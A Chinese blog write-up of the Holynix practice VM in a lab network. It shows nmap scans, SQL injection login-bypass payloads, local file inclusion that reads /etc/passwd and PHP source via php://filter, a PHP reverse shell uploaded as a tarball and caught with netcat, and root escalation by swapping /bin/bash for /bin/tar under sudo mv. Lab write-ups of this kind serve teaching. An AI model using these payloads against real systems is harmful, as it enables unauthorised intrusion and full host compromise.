Holynix--打靶笔记
|
安全相关,靶场复现
|
7,290

1159 字
|
11 分钟

靶机设置

网络配置为NAT模式,并且将MAC地址改为:{ 00:0C:29:BC:05:DE }

(点“高级”修改MAC地址)

image
​​
image

Nmap扫描

主机发现

在靶机启动前后分别进行一次c段的扫描,对比新增IP,即为靶机IP:192.168.9.151

sudo nmap -sn 192.168.9.150/24

image
image

TCP开放端口扫描

sudo nmap -sT --min-rate 10000 -p- 192.168.9.151

image

只开放了一个80端口o.O。这下省事了。

不过保险起见,做一下UDP扫描

UDP开放端口扫描

sudo nmap -sU --min-rate 10000 -p- 192.168.9.151

image

也没有开放

TCP详细信息扫描

sudo nmap -sT -sV -O -p80 192.168.9.151

image

Ubuntu+Apache

Vuln脚本扫描

sudo nmap --script=vuln -p80 192.168.9.151

结果能看出来:登陆界面有sql注入,然后有个文件上传的地方

这俩重点。

|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)                                                                                                        
| http-slowloris-check:                                                                                                                                                              
|   VULNERABLE:                                                                                                                                                                      
|   Slowloris DOS attack                                                                                                                                                             
|     State: LIKELY VULNERABLE                                                                                                                                                       
|     IDs:  CVE:CVE-2007-6750                                                                                                                                                        
|       Slowloris tries to keep many connections to the target web server open and hold                                                                                              
|       them open as long as possible.  It accomplishes this by opening connections to                                                                                               
|       the target web server and sending a partial request. By doing so, it starves                                                                                                 
|       the http server's resources causing Denial Of Service.                                                                                                                       
|   
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.9.151
|   Found the following possible CSRF vulnerabilities: 
|   
|     Path: http://192.168.9.151:80/?page=login.php
|     Form id: 
|     Form action: /index.php?page=login.php
|   
|     Path: http://192.168.9.151:80/index.php?page=login.php
|     Form id: 
|_    Form action: /index.php?page=login.php
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.9.151:80/?page=login.php%27%20OR%20sqlspider
|     http://192.168.9.151:80/?page=login.php%27%20OR%20sqlspider
|     http://192.168.9.151:80/index.php?page=login.php%27%20OR%20sqlspider
|     http://192.168.9.151:80/?page=login.php%27%20OR%20sqlspider
|     http://192.168.9.151:80/?page=login.php%27%20OR%20sqlspider
|_    http://192.168.9.151:80/index.php?page=login.php%27%20OR%20sqlspider
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /login.php: Possible admin folder
|   /login/: Login page
|   /home/: Potentially interesting folder
|   /icons/: Potentially interesting folder w/ directory listing
|   /img/: Potentially interesting folder
|   /index/: Potentially interesting folder
|   /misc/: Potentially interesting folder
|   /transfer/: Potentially interesting folder 
|_  /upload/: Potentially interesting folder
MAC Address: 00:0C:29:BC:05:DE (VMware)

Getshell

80界面-登陆

因为只有一个80端口开放,所以打开看看:

image

我去好丑啊!


Home点不了,只能点进登陆界面:

image

随手测一下弱密码admin:admin​。嗯,不对。

不过这个邮箱?Itorvalds​,Linux之父,不道是不是有含义,反正记一下吧。

image

来吧前面测出来的SQL注入:

username=1'#
password=1'

image

暴露出来了,username传入的单引号会被转义,但password传入的单引号不会。所以我们的注入点在password,username就随便了。

以及后端的SQL语句:

select * from account where username='$_POST' AND password='$_POST'

这里我们分析一下:因为username不存在注入,我们又没有用户名,所以这个AND判断的前半一定是错的。

有个知识点嗷:SQL语句,优先级 AND>OR

所以:select * from table where 0 and 0 or 1​ = select * from table where (0 and 0) or 1​=1

这样思路就清楚了,我们构造万能密码进去~

username=0
password=1' or 1=1 #

image

登陆成功。我们用户名是alamo。

80界面-walkAround

来吧随便点点。

注意到我们切换界面时,使用的是page传参。可能有文件包含?估计是没有办法利用的,毕竟vuln没扫出来,但是试试

image

果然是不行滴。

image


OK来到最期待的Upload!

image

我们构造一个php-shell(不会有人不知道为啥要用php吧,罚你看十遍url!)然后用gzip压缩后上传即可~

这里知道一个新信息:kali自带有一些shell。路径为/usr/share/webshell

将我们需要的php反弹脚本拷贝到目录下:

cp /usr/share/webshells/php/php-reverse-shell.php ./

vim编辑修改IP为kali的IP。记得端口是1234就行没必要改

image

gzip压缩:gzip -k php-reverse-shell.php​。-k​选项会保留原始文件

然后上传即可:遗憾,alamo不允许上传文件。

image

那么接下来的目标就是找更高级别的用户,说不定他们就能上传文件。

继续点点看:在Security​界面发现了另一个疑似存在文件包含的地方。

image

这里Burpsuite抓包也可以,但是为了拉风(?)加上模仿红笔师傅,我选择F12查看,找找是怎么发送的请求:

image

测试一下:http://192.168.9.151/index.php?page=ssp.php&text_file_name=ssp/email.txt

image

OK就是这个参数。接下来测试一下文件包含:http://192.168.9.151/index.php?page=ssp.php&text_file_name=/etc/passwd

image

root:x:0:0:root:/root:/bin/bash
alamo:x:1000:115::/home/alamo:/bin/bash
etenenbaum:x:1001:100::/home/etenenbaum:/bin/bash
gmckinnon:x:1002:100::/home/gmckinnon:/bin/bash
hreiser:x:1003:50::/home/hreiser:/bin/bash
jdraper:x:1004:100::/home/jdraper:/bin/bash
jjames:x:1005:50::/home/jjames:/bin/bash
jljohansen:x:1006:115::/home/jljohansen:/bin/bash
ltorvalds:x:1007:113::/home/ltorvalds:/bin/bash
kpoulsen:x:1008:100::/home/kpoulsen:/bin/bash
mrbutler:x:1009:50::/home/mrbutler:/bin/bash
rtmorris:x:1010:100::/home/rtmorris:/bin/bash

这里我把有/bin/bash​的用户截下来了。

可惜,shadow不能看。

image

没关系,不是有SQL注入嘛,咱们万用密码进去就行——

username=0
password=1' or username="etenenbaum" #

# select * from account where username='0' and password='1' or username="etenenbaum" #'
# 实际上就是:select * from account where username="etenenbaum"

image

幸运!这个用户可以上传。

image

但是不知道路径诶。用隔壁文件包含看看:http://192.168.9.151/index.php?page=ssp.php&text_file_name=./transfer.php

image

噢诶诶诶,有点乱码,base64读出来看看:http://192.168.9.151/index.php?page=ssp.php&text_file_name=php://filter/read=convert.base64-encode/resource=./transfer.php

image

<?php
if ( $auth == 0 ) {
        echo "<center><h2>Content Restricted</h2></center>";
} else {
    if ( $upload == 1 )
    {
        $homedir = "/home/".$logged_in_user. "/";
        $uploaddir = "upload/";
        $target = $uploaddir . basename( $_FILES['uploaded']['name']) ;
        $uploaded_type = $_FILES['uploaded']['type'];
        $command=0;
        $ok=1;

        if ( $uploaded_type =="application/gzip" && $_POST['autoextract'] == 'true' ) {   $command = 1; }

        if ($ok==0)
        {
            echo "Sorry your file was not uploaded";
            echo "<a href='?index.php?page=upload.php' >Back to upload page</a>";
        } else {
                if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
            {
                echo "<h3>The file '" .$_FILES['uploaded']['name']. "' has been uploaded.</h3><br />";
                echo "The ownership of the uploaded file(s) have been changed accordingly.";
                echo "<br /><a href='?page=upload.php' >Back to upload page</a>";
                if ( $command == 1 )
                {
                    exec("sudo tar xzf " .$target. " -C " .$homedir);
                    exec("rm " .$target);
                } else {
                    exec("sudo mv " .$target. " " .$homedir . $_FILES['uploaded']['name']);
                }
                exec("/var/apache2/htdocs/update_own");
                } else {
                echo "Sorry, there was a problem uploading your file.<br />";
                echo "<br /><a href='?page=upload.php' >Back to upload page</a>";
            }
        }
    } else { echo "<br /><br /><h3>Home directory uploading disabled for user " .$logged_in_user. "</h3>"; }
}
?>

用的tar xzf​解压。那压缩包要重新压缩了。

分析程序可以知道,解压的目录:$homedir = "/home/etenenbaum/"​,那我们访问对应的url即可:

http://192.168.9.151/~etenenbaum/

image

点之前开一下监听:nc -lvnp 1234

image

提权

基础信息查看

确认的确是靶机。

image

发现linux内核比较老,可能可以内核提权。不过这个不优先考虑。

先dpkg看看有没有python,咱们提升一下shell的交互性

image

sudo -l​看看:

image

mv提权

sudo mv /bin/tar /bin/tar_backup
# 将原本的tar备份

sudo mv /bin/bash /bin/tar
# 将/bin/bash移动到/bin/tar

sudo /bin/tar
# == sudo /bin/bash

image

image

writeup打靶笔记网络安全
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇